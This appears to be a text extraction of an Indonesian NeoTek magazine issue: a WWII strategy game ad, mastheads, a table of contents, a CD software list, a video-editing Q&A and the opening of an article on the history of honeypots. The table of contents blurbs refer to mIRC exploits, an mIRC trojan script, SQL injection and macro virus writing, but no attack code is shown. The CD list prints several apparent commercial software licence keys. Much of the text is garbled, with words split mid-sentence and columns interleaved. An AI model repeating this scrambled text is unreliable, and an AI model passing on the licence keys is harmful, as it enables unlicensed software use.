Honeypot_ Konsep Dasar SQL Injection

Document Sample
Honeypot_ Konsep Dasar SQL Injection Powered By Docstoc
					NeoSoft

RTS Game Mutakhir Perang Dunia II
Einsenhower, Rommel, dan Zhukov adalah jendral-jendral utama dari Sekutu, Jerman, serta Soviet sewaktu Perang Dunia II, dan anda dapat merasakan kerumitan yang mereka hadapi dalam pertempuran-pertempuran yang sangat menentukan dalam tingkat ketelitian sejarah yang tinggi.

Blitzkrieg

ketelitian yang meB ukan hanya tingkat game ini, sejarahbertempur rupakan kelebihan dalam pun pemain dapat memilih langsung terlibat dalam pertempuran mati-matian untuk mendominasi medan tempur, atau dapat pula memilih untuk secara hati-hati melaksanakan dulu misi-misi sampingan. Ketelitian Sejarah Ketelitian sejarah dimunculkan bukan hanya dari campaign-nya, melainkan kapabilitas dan karakteristik sebenarnya pada waktu itu. Ketelitian sampai ke ketebalan perlindungan setiap jenis tank sampai berbagai jenis senapan yang digunakan oleh infantri. Dua Jenis Editor Anda dapat merancang game anda sendiri, bukan hanya menggunakan Mission Editor seperti yang lazim pada game sejenis, melainkan juga Resource Editor, yang di sini anda dimungkinkan merancang game hampir dari segala segi: menambah dan merancang kembali satuan-satuan tempur, karakteristiknya, warna, tekstur, suara, dan berbagai hal lainnya. Fitur-fitur Utama Game • Stuktur campaign yang fleksibel yang membebaskan anda dari setelan kesulitan ataupun level standar yang biasanya ada pada game serupa. • Campaign yang akurat mengikuti sejarah, yang disini anda dapat memimpin tentara Sekutu, Jerman, atau Soviet melalui pertempuranpertempuran yang sungguh-sungguh terjadi sewaktu Perang Dunia II.

• Mission dan Resource Editor memungkinkan anda menciptakan campaign, chapter, ataupun mission yang baru dengan sama sekali mengubah lingkungan game maupun satuan-satuan tempurnya. • Lahan dan perbukitan yang realistis, termasuk lebih dari 350 jenis bangunan dan obyek. • Anda mengendalikan lebih dari 200 macam kendaraan militer dan lebih dari 40 macam satuan infantri yang berinteraksi secara alamiah, berdasarkan sifat-sifat fisik dan karakteristik sebenarnya. • Anda dapat membangun jembatan, menggali lubang perlindungan, menyebar ranjau, reparasi dan memasok kendaraan tempur, dan bila perlu memanggil dukungan udara. • Pertempuran terjadi pada musim, iklim, dan kondisi cuaca yang berbeda-beda. • Dukungan multiplayer LAN maupun Internet.
Windows 98/ME/2000/XP, DirectX 8.1 366 MHz Pentium II/Athlon 64 MB RAM 8 MB 3D videocard Riva TNT 1 GB hard disk space

Sistem Minimum

Sistem Direkomendasikan

Windows 98/ME/2000/XP, DirectX 8.1 600 MHz Pentium III/Athlon 128 MB RAM 32 MB 3D videocard GeForce 256 1 GB hard disk space

HomePage Harga NeoTek + CD: Rp20.000,- (P. Jawa) Rp22.000,- (Luar P. Jawa)

Dunia Teknologi Baru

N EOTE K

Salam!
Honeypot: Melacak Hacker

Anatomi suatu serangan hacking

Footprinting

Scanning

Enumeration

Gaining Access

Escalating Privilege

• Honeypot yang menanti datangnya lebah-lebah hacker untuk mempelajari gerakgeriknya. Ilustrasi di atas adalah honeypot menggunakan VMWare pada FreeBSD.

Pilfering

Covering Tracks

Creating Backdoors Denial of Service

pabila kebanyakan komputer menghindari terkena serangan hacker, yang ini malah mengharapkan agar mendapatkan serangan. Berbeda dengan komputer untuk kerja, komputer yang ini disebut honeypot, suatu botol madu yang menjebak masuk lebah-lebah hacker. Honeypot sendiri ada yang ditujukan untuk melindungi sisp tem secara keseluruhan (production honeypot), ada pula yang r fungsinya untuk mempelajari komunitas black-hat (research honeypot). Jadi jangan senang dulu kalau berhasil nge-root, siapa tahu anda sebenarnya cuma masuk perangkap.

A

Redaksi redaksi@neotek.co.id

Lengkapi pengetahuan hacking dan PC security anda dengan berlangganan majalah NeoTek: Hubungi KRISHNAdiSTRIBUTOR Tel. (021) 5835 0080 HP. (0816) 1187 111 (Boedi) email: krishnadistributor@neotek.co.id Kontak: Boedi Krishnadi

Bagaimana menghubungi N EOTEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id

ADMINISTRASI IKLAN
Tel. 021-5481457 Tel. 021-5481457

SURAT PEMBACA WEBMASTER

Fax. 021-5329041

support@neotek.co.id webmaster@neotek.co.id

SIRKULASI NEOTEK ALAMAT REDAKSI
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482 email: kosasih@indo.net.id

PEMASARAN
#neoteker

Hedhi Sabaruddin, 0812-1891827

CHATROOM DI DALNET MILIS PARA NEOTEKER

http://groups.yahoo.com/group/majalahneotek

Vol. IV No. 07 NeoTek

1

Daftar Isi

Daftar Isi
FOKUS VOL. IV NO. 7

NeoTek Vol. IV No. 7
NeoStyle
Artikel penutup dari rangkaian artikel mengenai video editing, yang membahas cara membentuk MPEG file yang kemudian di-burn menjadi video CD.

16

Video Burning

HONEYPOT

Melacak Hacker

18 10 12 14
Specter 7.0: Instalasi dan Pengenalan
Honeypot komersial yang sangat baik, dapat mengemulasi berbagai macam sistem operasi dengan port-port-nya.

Darwin Streaming Server

NeoStart
Dimulai dengan Deception Toolkit karya Fred Cohen, honeypot kini sudah berkembang jauh, baik pada sistem Unix maupun Windows.

6 8

Melacak Hacker

Ingin menyediakan layanan audio maupun video streaming pada situs web anda? Bila ShoutCast server cocok untuk audio streaming, maka Darwin Streaming Server dapat digunakan baik untuk layanan streaming audio maupun video.

Specter 7.0: Opsi dan Konfigurasi

Konfigurasi yang tepat akan membuat honeypot ini sangat efektif.

45

PhotoArtMaster: Seniman Dadakan

Back Officer Friendly

Software sederhana yang sangat baik untuk memahami konsep honeypot. Berjalan pada segala jenis Windows dan diantaranya memonitor Back Orifice.

KF Sensor: Dari Spam Sampai DoS

Mampu menjebak spammer serta menangkal serangan Denial of Service.

Perlu lukisan cat air dalam waktu cepat? Manfaatkan foto apa saja yang cocok subyeknya dan ubah foto biasa ini menjadi suatu karya seni digital dengan cepat dan hanya dalam beberapa langkah yang mudah.

Situs NeoTek
Link Langsung
Kunjungi situs-situs yang dibahas di majalah NeoTek dengan sekali klik lewat situs NeoTek.

www.neotek.co.id

Jadikan situs NeoTek sebagai pangkalan Anda berselancar

Layanan Rupa-rupa NeoTek
Channel #neoteker di Dalnet Ngobrol ramai-ramai sesama NeoTeker Web Chat Room Kini tidak usah jauh-jauh untuk ngobrol langsung dengan sesama NeoTeker Mailing List Ini yang paling ramai. Segera ikutan berbagi pengalaman berinternet! NeoTeker Official Portal http://www.neoteker.or.id Situs komunikasi antar Neoteker. Neoteker Internet Radio http://dj.neoteker.or.id:8000

NeoTek versi PDF

Kehabisan NeoTek di kota Anda? Dapatkan saja versi PDF-nya. Gratis!

Download

48

PP3 Private Album: Menjaga Privacy

Tersedia juga download di situs NeoTek selain dari situs aslinya

Punya file-file grafik maupun video yang hanya untuk kepentingan pribadi? Lindungi file-file ini dari mata iseng yang sekarang ini semakin merajalela saja

2

NeoTek Vol. IV No. 07

Daftar Isi

NeoTutor
33 34
Shutdown via Email
Lupa mematikan komputer anda di rumah? Matikan saja secara remote menggunakan software SVE (Shutdown Via Email).

0

Blitzkrieg
Strategy game dengan setting Perang Dunia II: Asik dimainkannya!

Delphi Workshop: The Making of SVE

NeoProfil
3
Walau belum punya Pocket PC sendiri, anda bisa menggunakan emulatornya lengkap dengan berbagai macam skin.

SVE pada dasarnya adalah suatu software yang memonitor masuknya email melalui POP Account dan apabila ada email yang masuk dengan subyek tertentu, maka komputer akan shutdown. Dibuat menggunakan Delphi.

Editorial Office
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482

40 42

Skin Emulator PPC

Business Office
Gedung Cahaya Palmerah 503 Jl. Palmerah Utara III No. 9 Jakarta 11480 Telp. 021-5481457 Fax. 021-5329041

Membuat aplikasi untuk Pocket PC tidaklah terlalu sulit, khususnya apabila anda sudah mulai belajar Visual Basic, sebab dapat dibuat menggunakan eMbedded Visual Basic (eVB) yang bagian dari eMbeded Visual Tools.

36

eVB pada Pocket PC

ASP: Computer Polling

Sekarang lagi jamannya buat polling. Anda juga dapat melengkapi situs anda dengan computer polling yang dibuat menggunakan script Active Server Pages (ASP) ini.

Pemimpin Umum
Fachri Said

NeoTekno
24
Mengeksploitasi mIRC Bug
Ada bug ada juga exploit-nya dan itu berlaku juga untuk mIRC yang mempunyai kelemahan pada fasilitas DCC Send. Kenali supaya anda jangan jadi korbannya.

Fasilitas CTCP (Client to Client Protocol) dapat dimanfaatkan dengan script yang tepat sehingga bekerja sebagai suatu trojan di komputer lawan.

26 30

mIRC Remote Injection

Pemimpin Redaksi
Kosasih Iskandarsjah

Redaktur Ahli
Onno W. Purbo Michael S. Sunggiardi

Pemimpin Usaha
Fahmi Oemar Dadang Krisdayadi

Konsep Dasar SQL Injection

SQL Injection semakin ramai saja setelah bobolnya situs KPU. Sebenarnya bagaimana konsep dasarnya?

Redaktur Pelaksana
MA Rody Candera

Sekretaris Redaksi
Marni

NeoRagam

NeoTek Vol. IV No. 08 SMS dan GSM Hacking
Pemakai handphone lebih banyak daripada pemakai komputer dan dengan sangat dekatnya teknologi komunikasi dengan informasi, maka ancamannya pun semakin serupa juga, mulai dari SMS Spoofing, SMS Bombing, sampai Penggandaan Voucher!

Webmaster
Supriyanto

4 5

Klak Klik Game: Blitzkrieg Q&A Video Editing

Sirkulasi
Hedhi Sabaruddin

Adm. Langganan
KRISHNAdiSTRIBUTOR

Daftar Isi CD NeoTek Ketinggalan Membaca NeoTek?

Iklan dan Promosi
Dwi Hastono, G. Widianto

Keuangan
Aswan Bakri

Virus Makro: Membuat dan Menangkalnya
Program Microsoft Word dengan fasilitas makronya dapat digunakan untuk membuat virus.

Bank
Bank BNI a.n. PT NeoTek Maju Mandiri No. rekening 070.001709720.001 Bank BCA Matraman
(khusus untuk langganan)

a.n. Boedi Krishnadi No. rekening 342-239-1611

Vol. IV No. 07 NeoTek

3

NeoRagam

Klak Klik
GAME BULAN INI
Blitzkrieg

daftar isi cd neotek
ALI INI SESUAI DENGAN BAHASAN, CD NeoTek berisi berbagai software honeypot, baik yang berjalan pada sistem operasi Unix maupun Windows, baik freeware maupun produk komersial. Anda bisa mulai dengan mempelajari Back Officer Friendly (berjalan pada segala jenis Windows, serta ada versi Unix-nya juga), sebab merupakan honeypot sederhana yang akan memberi gambaran apa honeypot itu sebenarnya. Specter 7.0 dan Specter Remote 7.0 adalah honeypot komersial yang cukup lengkap, dapat mengemulasi 13 macam sistem operasi yang berbeda dan hanya berjalan pada Windows NT, 2000, dan XP. KF Sensor juga cukup baik serta mempunyai fasilitas anti-spam serta dapat mengatasi DoS (Denial of Service), sayang hanya berupa trial version. Jackpot 1.2.2 merupakan SMTP honeypot, yaitu untuk menjebak spammer dan merupakan suatu aplikasi Java yang untuk menjalankannya anda harus terlebih dahulu menginstal JRE 1.2 ke atas. Untuk menjalankan Honeyd, terlebih dahulu anda harus menginstal WinPcap, libdnet, dan libevent. LaBrea Tarpid dikenal juga sebagai sticky honeypot, yaitu memperlambat gerakgerik hacker. Ada banyak honeypot yang berjalan pada sistem Unix. Yang komersial di antaranya adalah Symantec Decoy Server (sebelum-

K

98,85 MB

nya dinamakan ManTrap) dan hanya berjalan pada sistem operasi Solaris. Sayang demo version-nya tidak tersedia, tetapi anda dapat mencoba DTK (Deception Toolkit) dari Fred Cohen yang merupakan honeypot yang pertama dikembangkan. Untuk mencari informasi lebih jauh tentang jenis-jenis honeypot yang disediakan di CD NeoTek (serta honeypot lainnya) silakan pelajari informasi di: www.honeypots.net/honeypots/products

CD Burner, Graphics, dan Pocket PC
Untuk melengkapi bahasan video editing disediakan Nero Burning Rom 6, adapun PhotoArtMaster Classics 1.5 merupakan tool manipulasi foto menjadi karya seni. Program yang juga penting serta sangat ekstensif adalah eMbedded Visual Tools 3.0 2002, suatu tool untuk mengembangkan sendiri aplikasi untuk Pocket PC menggunakan eMbedded Visual Basic serta eMbedded Visual C++.

ang sudah terbiasa memainkan RTS (Real Time Strategy) game seperti Age of Empire atau Age of Mythology serta Rise of Nations dari Microsoft tidak akan mengalami kesulitan memainkan game ini. Game ini malah terkesan lebih realistis dibandingkan dengan RTS keluaran Microsoft di atas. Pada demo version-nya disediakan tiga campaign yang dimainkan berurutan: pertama German campaign, lalu Allied campaign, dan terakhir Russian campaign. Jangan terburu-buru menyerang seperti yang mungkin biasa anda lakukan pada RTS dari Microsoft, melainkan mainkan scout yang juga sebagai snipper. Scout dapat mengarahkan artillery untuk menghancurkan obyek-obyek dari jarak jauh selain menetralisir ancaman seperti membunuh operator artileri musuh maupun operator antiaircraft agar bomber atau ground attack plane anda dapat leluasa bergerak. Tapi awas... Musuh juga dapat mengeluarkan fighter plane untuk menghancurkan pesawat-pesawat anda. Semuanya perlu timing, strategi, dan taktik yang diperhitungkan secara hati-hati. Bukan asal serang saja.
Win 98/ME/2000/XP, DirectX 8.1 600 MHz Pentium III/Athlon 128 MB RAM 32 MB 3D videocard GeForce 256 1 GB hard disk space

Y

Papers
Tidak semua bahasan penting dapat dimuat dalam NeoTek edisi cetak, sehingga beberapa makalah sehubungan dengan bahasan juga disertakan, diantaranya makalah yang berhubungan dengan honeypot maupun SQL Injection.

Video Editing Q&A
erikut adalah pertanyaan-pertanyaan yang sering saya dapatkan ketika pembaca mengirim e-mail ke saya. Pembaca telah menunjukkan antusiasme terhadap dunia multimedia Indonesia.

B

1. Bagaimana caranya menset Pinnacle supaya gambar lebih bagus ? J: Setting default Pinnacle sudah bisa dikatakan bagus untuk mengolah gambar. Apabila gambar masih kurang bagus, mungkin karena hardware komputer yang kurang mendukung. Jangan lupa untuk memakai video capture untuk hasil yang maksimal. 2. Hardware apa saja yang bisa memaksimalkan kinerja komputer untuk video editing? J: video capture Snazzi 3 sudah bagus dan harganya mulai turun menjadi sekitar 3 jutaan,

lalu VGA card; ATI radeon 9200 128 MB juga sudah terjangkau sekitar 600 ribu-an. Apabila anda anggap VGA card tersebut masih kurang baik, gunakan VGA card khusus NVidia Quadro 4 yang harganya 800 US$, lalu prosesor yang diatas 2 GHZ, hard disk 80 GB, dan memori 256 MB sudah cukup. Jangan lupa CD writer... 3. Ketika membuat efek sendiri di Hollywood FX bagaimana men-savenya? J: Anda dapat mengklik tombol Save As default, memang tools ini tidak menyediakan save-nya sendiri. 4. Bagaimana dalam memilih handycam (camcorder)? hehehe... Saya sendiri tidak punya... tapi dengan meminjam dan bertanya kepada seorang sobat, katanya untuk hal ini harus diperhatikan zoom dan resolusi-nya. Semakin

tinggi semakin bagus, dan harus mendukung transfer data ke komputer, yang paling standar adalah melalui port USB. Untuk anda yang ingin membuat film sebaiknya pilih handycam yang banyak fasilitasnya seperti Steady Shock dan Nigh Shoot Vision. 5. Bagaimana cara membuat efek-efek orang terbang dan lain-lain seperti film-film Hollywood? J : Mereka banyak menggunakan Green atau Blue screen ketika membuat seseorang seolah-olah terbang, dengan men-shot adegan lapangan yang akan dijadikan latar orang terbang itu, lalu orang itu sendiri disangkutkan pada tali-tali di sudio yang telah terpasang Tirai Biru ataupun Hijau, lalu adegan ini digabungkan kedalam latar lapangan tadi. Andi Ismayadi (Fuzk3-kendi@yahoo.com)

4

NeoTek Vol. IV No. 07

NeoRagam

daftar isi cd neotek
HONEYPOT (WINDOWS)
Back Officer Friendly Specter 7.0 Specter Remote 7.0 WinRar 3.3.0 KF Sensor Trial Honeyd Windows nfrbofl.exe setup.exe setup.exe wrar330.exe kfsens10.exe honeyd-0.5q-win32.zip libdnet-1.5-msvc.zip libevent-0.6-win32.zip WinPcap_3_1_bete.exe LaBreaNT2_0.zip jackpot-1.2.2.zip j2re-1_4_2_04-windows-i586-p.exe backofficer.tar.gz baitnswitch-b.2.1.tar.gz bigeye-0.3.tar.gz dtk.tar.gz honeyd-0.2.tar.gz honeyd-0.7a-beta1.tar.gz honeyd-0.7a-beta2.tar.gz honeyd-linux-kit-0.5.tar.gz honeyd-linux-kit-0.5a.tar.gz honeyd-linux-kit-0.6.tar.gz HoneyWeb-0.4.tar.gz proxypot.html.pdf thp-0.4.6.tar.gz setup.exe 1A23-0006-7130-1204-8976-4901 PAMClassic15SL.exe 1030-MMBP-TH5T-LLTB pp3trial.exe Blitzkriegdemo-e.exe DarwinStreamingSrvr5.0.0.1-Linux.tar .gz StreamingProxy-4.1-Linux.tar.gz DarwinStreamingSrvr5.0.0.1.exe InstMsiW.exe Honeynet papers Worm Analysis

POCKET PC DEVELOPMENT TOOL
eMbedded Visual Tools 3.0 Palm Size PC 1.2 SDK Handheld PC 2.0 SDK Handheld PC 3.0 Pro SDK

evt2002web_min.exe TRT7H-KD36T -FRH8D-6QH8P-VFJHQ PalmSz.dexe mplatsdk.exe SDK.exe

PROYEK

LaBrea Tarpid Jackpot122

HONEYPOT (UNIX)
Back Officer Friendly Bait N Switch BigEye Deception Toolkit Honeyd

60mirc.txt 601mirc.txt 602mirc.txt 603mirc.txt Konsep Dasar SQL Injection escapestring.zip SQL Injection Papers advanced-sql-injection.pdf IntegrigyIntrotoSQLInjectionAttacks.pdf Man_SQL_Server_Using_SQL_Inj.pdf NC_Whitepaper_AttackPrevention.pdf WhitepaperSQLInjection.pdf Shutdown Via Email sve.exe eMbedded Visual Basic hello.zip Computer Polling ASP Program_KomPoll.zip

Eksploitasi mIRC Bug

HONEYPOT PAPERS

Bill Cheswick paper Know Your Enemy Papers

HoneyWeb Proxypot Tiny Honeypot Nero 6 UltraEdition

VIDEO EDITING & GRAPHICS
PhotoArtMaster Classic 1.5 PP3 Private AlbumTrial

GAME

Blitzkrieg Demo Darwin S Server RedHat9 Darwin S Proxy RedHat9 Darwin S Server Win 5.0.0.1 ActivePerl MSI Win NT

DARWIN STREAMING SERVER

berferd.pdf 01KnowYourEnemy1.pdf 02KnowYourEnemy2.pdf 03KnowYourEnemy3.pdf 04KnowYourEnemyWorm.pdf 05KnowYourEnemyForensic.pdf 06KnowYourEnemyStat.pdf 07KnowYourEnemyMotives.pdf 08KnowYourEnemyPassFing.pdf 09KnowYourEnemyUML.pdf 10KnowYourEnemyVMWare.pdf 11KnowYourEnemyVirHoneynets.pdf 12KnowYourEnemyHoneynet.pdf 13KnowYourEnemyGen2Honeynet.pdf 14KnowYourEnemyCCFraud.pdf 15KnowYourEnemySebek.pdf Pakistan Honeynet.pdf WirelessHoneypotTrick.pdf Gen2DataControl4Honeynets.pdf 010720-Analysis-CodeRed.pdf 010805-Analysis-CodeRedII.pdf 010921-Analysis-Nimda-2.pdf

Ketinggalan Membaca NeoTek?
eoTek dengan artikel-artikel hacking, security, programming, maupun sekedar memanfaatkan software pada dasarnya tidak akan pernah basi dan layak dikoleksi. Tetapi bagaimana apabila anda baru-baru ini saja tahu adanya NeoTek, atau edisi lama NeoTek ataupun CD-nya hilang, dipinjam tidak dikembalikan, ataupun rusak?

N

Aswan Bakri BCA KCP Rawamangun No. rek. 0940544131

Dapatkan dari Stockist
Untuk yang berada di luar Jakarta, menghubungi NeoTek di Jakarta akan membawa kerepotan selain juga harus menanggung ongkos kirim. Untuk itu NeoTek tersedia di beberapa kota sbb: Bandung CV Angkasa Jl. Merdeka No. 6, Bandung 40111 Tel. 021-4204795, 4208955, Fax. 022-4239183 Semarang Lestat Jl. Kaligarang 2B, Semarang 50237 Tel. 024-8411489, Fax. 024-8445211 Surabaya Toko Buku URANUS Jl. Ngagel Jaya 89-91, Surabaya Tel. 031-5681388 Gorontalo Arbyn Dungga Jl. Prof. Dr. Aloei Saboe No 54, Heledulaa Selatan, Gorontalo 96114 NeoTek di stockist dijual dengan cover price sebagai berikut:

Vol. I (tanpa CD) No. 1 s/d 9, Rp6500,Vol. I (tanpa CD) No. 10 s/d 12, Rp9500,Vol. II (+CD) No. 1 s/d 12, Rp19.500,Vol. III (+CD) No. 1 s/d 12, Rp19.500,Vol. IV (+CD) No. 1 s/d 3, Rp19.500,Vol. IV (+CD) No. 4 dst., Rp20.000,- (P. Jawa) dan Rp22.000,- (Luar P. Jawa)

Berlangganan
Untuk menjamin bahwa anda tidak lagi ketinggalan edisi NeoTek, paling baik berlangganan. Untuk itu hubungi: KRISHNAdiSTRIBUTOR Tel. (021) 5835 0080 HP. (0816) 1187 111 (Boedi) email: krishnadistributor@neotek.co.id Kontak: Boedi Krishnadi BCA No. rek. 342-239-1611 . Harga NeoTek+CD mulai edisi IV/04: Rp20.000,- ( P. Jawa) Rp22.000,- (Luar P. Jawa) Ongkos kirim gratis untuk DKI Jakarta, sedangkan untuk luar DKI Jakarta, Rp6500,- per eksemplar.

Dapatkan di Pameran
NeoTek selalu hadir di pameran-pameran M komputer di Jakarta. (Mega Bazaar Computer, Festival Komputer Indonesia, dan IndoComtech).

Dapatkan Langsung Cara pasti adalah mendapatkan langsung
dari NeoTek dengan menghubungi: PT NeoTek Maju Mandiri Gedung Cahaya Palmerah 503 Jl. Palmerah Utara III/9 Jakarta 11480 Telp. 021-5481457, Fax. 021-5329041 M email: redaksi@neotek.co.id (Marni) Keuntungannya anda dapat memesan majalah+CD, majalah saja, atau CD saja, tetapi anda akan dibebani ongkos kirim, selain harus mengirim uang terlebih dahulu ke rekening:

Ingin Menjadi Stockist?
Yang berminat sedikit berinvestasi dalam distribusi NeoTek, silakan hubungi pemasaran@neotek.co.id

Vol. IV No. 07 NeoTek

5

NeoStart

Apabila sebelumnya admin sistem dan jaringan bersikap defensif terhadap serangan hacker, maka dengan konsep honeypot keadaan menjadi sebaliknya. Pertahanan jadi bersifat ofensif!
tunggu-tunggu dan membuat anda gembira. Kok, begitu? Ya, karena yang kena serang adalah komputer yang anda pasang sebagai honeypot, istilah umum untuk komputer yang memang nilainya adalah apabila kena serang, kebalikan dari komputer produktif yang tentunya anda lindungi dengan segala cara agar selalu aman dari serangan hacker. Apabila selama ini kita selalu bersifat defensif terhadap serangan hacker, maka dengan honeypot bersifat ofensif. Satu atau beberapa komputer dalam sistem kita disediakan sebagai umpan dan serangan-serangan hacker dialihkan ke komputer ini. Sang hacker dibiarkan mengobrak-abrik sistem yang sebenarnya adalah penjara baginya, sambil perilakunya diamati dalam suatu research honeypot. Apabila kita tidak terlalu berminat untuk melakukan studi terhadap komunitas hacker, mungkin yang diperlukan adalah production honeypot dengan interaksi rendah saja, yang segera akan memperingatkan penyusup bahwa tindakannya sudah diketahui dan sebaiknya menjauh saja, daripada dikenali dan diproses secara hukum.

Melacak Hacker
Berbeda dengan yang pertama, Cheswick memang menyiapkan suatu sistem yang memang untuk diserang, menjadikannya kasus pertama dari honeypot yang sesungguhnya. Pada makalah ini Cheswick bukan saja membahas cara membangun dan menggunakan honeypot, melainkan juga menceritakan bagaimana seorang hacker Belanda dipelajari sewaktu dia menyerang dan menguasai sistem. Cheswick pertama-tama membangun suatu sistem dengan beberapa kelemahan (termasuk Sendmail) untuk mendapatkan ancaman apa saja yang ada dan bagaimana cara kerjanya. Tujuannya bukanlah untuk menangkap orang tertentu, melainkan untuk mempelajari kegiatan membahayakan apa saja yang bisa terjadi terhadap network dan sistemnya. Cheswick menciptakan suatu lingkungan terkontrol yang disebutnya sebagai ‘jail’ (ia tidak menyebutnya sebagai honeypot), yang mengurung kegiatan sang penyerang. Hacker Balanda dengan nickname Berfeld ini memasuki sistem dengan memanfaatkan kelemahan pada Sendmail sampai mendapatkan kendali terhadap sistem.

H O N EYPOT

K

OMPUTER ANDA KENA SERANG? INILAH SAAT YANG DI-

Sejarah Honeypot
Konsep serupa honeypot (sebelumnya belum diberi istilah seperti itu) dipercaya sudah cukup lama ada, walaupun tidak ada literatur yang membahasnya sebelum tahun 1990. Tahun 1990 Clifford Stoll menerbitkan buku The Cuckoo’s Egg, yang lebih mirip cerita detektif. Penerbitnya Pocket Books, yang lebih dikenal dengan novel. Inilah penerbitan pertama yang menguraikan konsep honeypot. Buku ini menceritakan kejadian sesungguhnya selama periode sepuluh bulan di tahun 1986-1987. Stoll adalah astronom pada Lawrence Berkeley Lab yang menjadi admin berbagai komputer untuk komunitas astronom. Selisih akuntansi senilai 75 sen membuatnya menyadari akan adanya hacker bernama ‘Hunter,’ yang telah menyusup kedalam sistem. Bukannya menutup account penyusup ini, Stoll malah membiarkannya berada dalam sistem, agar dapat mempelajarinya lebih jauh dan memburunya. Tanpa disadari penyerang, Stoll menyiapkan direktori SDINET (Strategic Defence Initiave Network) dan mengisinya dengan file-file yang pura-pura berisi berbagai file keuangan dan rahasia negara. Hacker ini ternyata tidak tertarik pada file-file keuangan. Makalah teknis pertama mengenai honeypot terbit pada tahun 1990 itu juga, tulisan Bill Cheswick berjudul ‘An Evening with Berfeld in Which a Cracker Is Lured, Endured, and Studied.’
6

Produk-produk Honeypot
Deception Toolkit (DTK)

Produk pertama honeypot yang tersedia untuk komunitas security baru diluncurkan pada tahun 1997 oleh Fred Cohen, D yaitu Deception Toolkit (DTK), tujuh tahun setelah konsep honeypot dibahas dalam buku dan makalah di atas. DTK adalah honeypot pertama yang gratis dan dapat anda download, install, dan coba sendiri (ada di CD NeoTek), yang berupa Perl script dan C code yang di-compile dan diinstall pada sistem Unix. DTK serupa dengan sistem Berfeld karya Cheswick, yaitu mengemulasi berbagai kelemahan sisten Unix. Apabila diserang, kelemahan yang diemulasi ini membentuk log dari perilaku dan kegiatan penyerang serta menyingkap

NeoTek Vol. IV No. 07

NeoStart
informasi mengenai sang penyerang. Tujuan DTK bukan hanya mendapatkan informasi, melainkan juga mengelabui (deceive) dan secara psikologis membingungkannya. CyberCop Sting Setelah DTK, pada tahun 1998 dikembangkan produk honeypot komersial pertama, CyberCop Sting, yang dikembangkan oleh Alfred Huger pada Secure Networks Inc., yang kemudian dibeli oleh NAI pada tahun 1998. Honeypot ini mempunyai beberapa fitur yang berbeda dari DTK. Pertama, dijalankan pada Windows NT. Kedua dapat mengemulasi beberapa sistem yang berbeda sekaligus. Jadi, CyberCop Sting dapat mengemulasi keseluruhan network, yang masing-masing sistem mempunyai servis khasnya masing-masing sesuai dengan sistem operasi yang diemulasinya. Penyerang mungkin men-scan sistem ini dan mendapatkan berbagai sistem Cisco, Solaris, dan NT. Penyerang mungkin melancarkan Telnet ke Cisco router dan mendapatkan banner yang menyatakan bahwa sistem ini adalah Cisco. Melancarkan FTP ke Solaris server dan mendapatkan informasi bahwa server itu memang Solaris, atau membentuk koneksi HTTP ke server NT. Bahkan IP stack diemulasi agar sesuai dengan sistem operasi yang diemulasi. Dengan cara ini, apabila penyerang melakukan active fingerprinting dengan Nmap, maka sistem operasi yang terdeteksi akan menampilkan service-service yang sesuai untuk IP address-nya. Banyaknya image honeypot yang dibentuk membuat sistem ini lebih mudah ditemukan dan diserang oleh hacker, dan memang di sinilah nilai sebenarnya suatu honeypot: mudah ditemukan dan diserang. Honeypot yang tersembunyi dan sulit diserang akan kehilangan fungsinya sebagai honeypot. Sayang produk yang secara teknis amat baik ini tidak berhasil secara komersial dan kini sudah dihentikan pengembangannya. Setelah kemusnahannya, muncul beberapa honeypot komersial yang sangat bagus seperti Specter (dari NetSec) dan Mantrap (dari Recourse). Mantrap kemudian diambil alih oleh Symantec dan dinamakan Symantec Decoy Server. NetFacade Pada tahun 1998, Marty Roesch, sewaktu bekerja pada GTE Internetworking, mulai mengembangkan suatu solusi honeypot untuk klien pemerintah. Roesch dan rekan-rekannya mengembangkan suatu sistem honeypot yang mengemulasi keseluruhan network kelas C. Terdapat sampai tujuh jenis sistem operasi yang diemulasi bersama berbagai servisnya. Walaupun produk komersial yang dihasilkannya, NetFacade, kurang mendapat perhatian, manfaat sampingannya adalah dikembangkannya network-based debugging tool yang mengarah pada pengembangan Snort, suatu open source IDS. Snort pernah dibahas terinci di NeoTek II/11. BackOfficer Friendly BackOfficer Friendly (BOF) merupakan honeypot freeware berbasis Windows maupun Unix, dikembangkan Marcus Ranum, dan diluncurkan pada tahun 1998 juga. BOF gratis, amat mudah digunakan, dan berjalan pada berbagai sistem Windows. BOF merupakan program pertama yang memperkenalkan konsep honeypot pada kebanyakan orang dan akan kita bahas tersendiri pada NeoTek kali ini. Honeynet Project Suatu research group non-profit terdiri dari 30 orang profesional security membentuk Honeynet Project, yang berkonsentrasi pada penelitian terhadap komunitas black hat hacker. Tool utamanya adalah Honeynet, suatu honeypot advanced. Semua metode penelitian, khususnya tentang cara merancang dan menerapkan honeypot didokumentasi untuk umum dalam suatu seri makalah berjudul Know Your Enemy. Buku dengan judul yang sama juga diterbitkan pada tahun 2001. Makalah-makalah Know Your Enemy (semuanya ada 15 makalah) dapat anda peroleh dalam dalam format PDF pada CD NeoTek kali ini. Honeynet sendiri pada dasarnya bukanlah suatu solusi tunggal, melainkan lebih merupakan suatu arsitektur. Arsitektur ini sendiri didefinisikan dari tiga kebutuhan: data control, data capture, dan untuk multiple honeynets, data collection. Sejauh ini dikenal dua macam arsitektur honeynet: GenI (first generation) dan GenII (second generation). Sesuai namanya GenI adalah honeynet pertama yang diterapkan pada tahun 1999. Teknologi GenI kemampuannya sebatas mengontrol dan mengurung penyerang, tetapi sangat ampuh dalam menangkap serangan otomatis kelas pemula. Namun karena relatif mudah dikenali (di-fingerprint), maka GenI tidak banyak gunanya dalam menangkal serangan hacker kelas atas. GenII dikembangkan pada tahun 2002 dengan menjawab berbagai kelemahan yang ada pada GenI. Perubahan terbesar terjadi khususnya dalam data control. Virtual Honeynets Bidang baru dalam honeynets agar solusinya menjadi murah namun tetap efektif. Apabila GenI dan GenII merupakan arsitektur dengan banyak hardware, maka pada virtual honeynets semuanya dijalankan pada satu sistem fisik saja. Ada dua opsi virtual honeynets, yaitu dengan memanfaatU kan VMWare atau User Mode Linux (UML). Pada VMWare misalnya dapat dijalankan berbagai sistem operasi seperti Linux, Windows 98, Windows 2000, Windows XP, maupun Solaris. VMWare pernah dibahas di NeoTek III/02 dan III/05, sedangkan UML dibahas di NeoTek IV/01.

Peluasan Pemanfaatan Honeypot
